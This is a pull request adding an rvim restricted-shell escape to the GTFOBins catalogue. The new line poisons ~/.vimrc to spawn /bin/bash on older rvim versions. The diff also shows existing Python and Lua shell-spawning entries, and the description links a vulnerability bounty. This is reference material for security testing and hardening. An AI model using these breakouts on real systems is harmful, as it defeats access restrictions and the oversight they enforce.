### PR TITLE
Add rvim shell trick (restricted environment breakout)

### DIFF
--- a/_gtfobins/rvim.md
+++ b/_gtfobins/rvim.md
@@ -1,6 +1,8 @@
 ---
 functions:
   shell:
+    - description: This requires that `rvim` version is `< 9.0.1440`.
+      code: rvim -c ':redir! > ~/.vimrc | echo "!python3 -c \'import pty; pty.spawn(\"/bin/bash\")\'" | redir END | set shell=/usr/bin/vim | diffpatch'
     - description: This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3.
       code: rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
     - description: This requires that `rvim` is compiled with Lua support.


### PR DESCRIPTION
Hello,

I added to the `rvim` page a trick to get a shell through the poisonning of the `~/.vimrc` file, It only works on older versions of rvim.

Let me know if anything is wrong.

Here is the link to the vuln discover thread : https://huntr.dev/bounties/d60e9e45-be06-40cb-99ad-d94ecdfb0fa4/

Thank you :heart: 